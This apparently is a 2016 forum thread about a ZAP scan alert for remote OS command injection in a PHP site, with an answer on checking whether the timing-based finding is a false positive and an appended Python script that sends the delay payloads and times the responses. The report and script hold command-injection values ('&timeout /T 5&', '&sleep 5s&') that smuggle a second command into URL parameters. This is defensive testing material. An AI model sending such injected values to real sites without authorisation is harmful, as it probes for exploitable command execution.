Dinesh Rawat February 2016

zaproxy scan report solution in PHP

I am using zaproxy for automatic testing of my site. There is a P1 alert in the scan report. I don't know how to rectify this error. Can someone please help me out:

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview%22%26timeout+%2FT+5%26%22&mode=current

Parameter

r

Attack

video/view"&timeout /T 5&"

Answers


Dinesh Rawat February 2016

Alert Detail

High (Medium) Remote OS Command Injection

Description

Attack technique used for unauthorized execution of operating system commands. This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs.

URL

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview%22%26timeout+%2FT+5%26%22&mode=current

Parameter

r

Attack

video/view"&timeout /T 5&"

URL

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview&mode=current%22%7Ctimeout+%2FT+5

Parameter

mode

Attack

current"|timeout /T 5

URL

https://example.com/index.php?r=site/login

Parameter

userTimeZone

Attack

&sleep 5s&

URL

https://example.com/js/tinymce/tinymce.min.js?version=1405493567%26sleep+%7B0%7Ds%26

Parameter

version

Attack

1405493567&sleep {0}s&

URL

https://example.com/themes/sharperax/css/sh


Psiinon February 2016

OK, so this is a timing attack. These are prone to false positives if the server is under load.

You should always try to manually validate any potential vulnerability reported by a scanning tool, including ZAP.

In this case open the URLs referenced in your browser - did it take around 5 seconds to load? Then change the '5' on the URL to something much larger, e.g. '30' - did it now take 30 seconds?

If it took around the same length of time then this is likely to be a false positive.
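The manual check described in the answer above, written out as an added Python example that is not part of the original thread or of ZAP itself: it rebuilds the reported URL with ZAP's Windows-style payload at the reported delay and again at a larger one, times each request against an unmodified baseline, and classifies the result the way the answer suggests. The base URL, parameter names and payload shapes are taken from the report; the 1.5 second tolerance, the `fetch` helper and all function names are assumptions made for this example.

```python
"""Manual validation of a timing-based OS command injection alert.

Added example, not code from the original post or from ZAP. It follows the
answer's procedure: time the unmodified page, then the page with the
injected delay at its reported value, then with a much larger value, and
check whether the response time tracks the injected delay.
"""
import time
import urllib.parse
import urllib.request

# Taken from the reported URL; "r" is the parameter ZAP flagged.
BASE = "https://example.com/index.php"
PARAMS = {"id": "1535", "source": "home", "storyId": "468",
          "r": "video/view", "mode": "current"}


def windows_payload(base_value, delay):
    """ZAP's Windows-style payload seen in the report: close the quoted
    argument, chain `timeout /T <delay>`, reopen the quote."""
    return f'{base_value}"&timeout /T {delay}&"'


def unix_payload(base_value, delay):
    """ZAP's Unix-style payload seen in the report for other parameters."""
    return f"{base_value}&sleep {delay}s&"


def build_url(base, params, name, value):
    """Rebuild the target URL with one parameter replaced by an attack value.
    urlencode uses quote_plus, which reproduces the encoding in the report."""
    p = dict(params)
    p[name] = value
    return f"{base}?{urllib.parse.urlencode(p)}"


def fetch_seconds(url, fetch=None, timeout=60):
    """Time one request. `fetch` is injectable so the logic can be exercised
    without network access (assumed helper, not part of any library)."""
    if fetch is None:
        def fetch(u):
            with urllib.request.urlopen(u, timeout=timeout) as resp:
                resp.read()
    start = time.perf_counter()
    fetch(url)
    return time.perf_counter() - start


def verdict(baseline, short_delay, short_seconds, long_delay, long_seconds,
            slack=1.5):
    """Classify the three timings.

    Only when both runs are slowed by roughly the injected delay, so that the
    larger delay also produces the proportionally longer response, is the
    finding treated as real. Two payload runs that take about the same time
    regardless of the delay value are the false-positive pattern the answer
    describes. `slack` (seconds of tolerance for server jitter) is assumed.
    """
    short_ok = abs((short_seconds - baseline) - short_delay) <= slack
    long_ok = abs((long_seconds - baseline) - long_delay) <= slack
    if short_ok and long_ok:
        return "likely injectable"
    if abs(short_seconds - long_seconds) <= slack:
        return "likely false positive"
    return "inconclusive"


def check(name="r", delays=(5, 30), payload=windows_payload, fetch=None):
    """Run the baseline / short-delay / long-delay comparison for one
    parameter and return the verdict string."""
    original = PARAMS[name]
    short_delay, long_delay = delays
    baseline = fetch_seconds(build_url(BASE, PARAMS, name, original), fetch)
    short_s = fetch_seconds(
        build_url(BASE, PARAMS, name, payload(original, short_delay)), fetch)
    long_s = fetch_seconds(
        build_url(BASE, PARAMS, name, payload(original, long_delay)), fetch)
    return verdict(baseline, short_delay, short_s, long_delay, long_s)


if __name__ == "__main__":
    # Live run against the target (needs network access and authorisation).
    print("r (Windows payload):", check("r"))
    print("r (Unix payload):", check("r", payload=unix_payload))
```

Because the alert is timing based, a loaded server can push a single measurement either way; repeating each request a few times and comparing the minimum of each group gives a steadier signal than one sample. Test the Unix-style payload as well as the Windows one, since the report shows both and the target's operating system is not known from the alert alone.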

Post Status

Asked in February 2016
Viewed 3,327 times
Voted 12
Answered 2 times
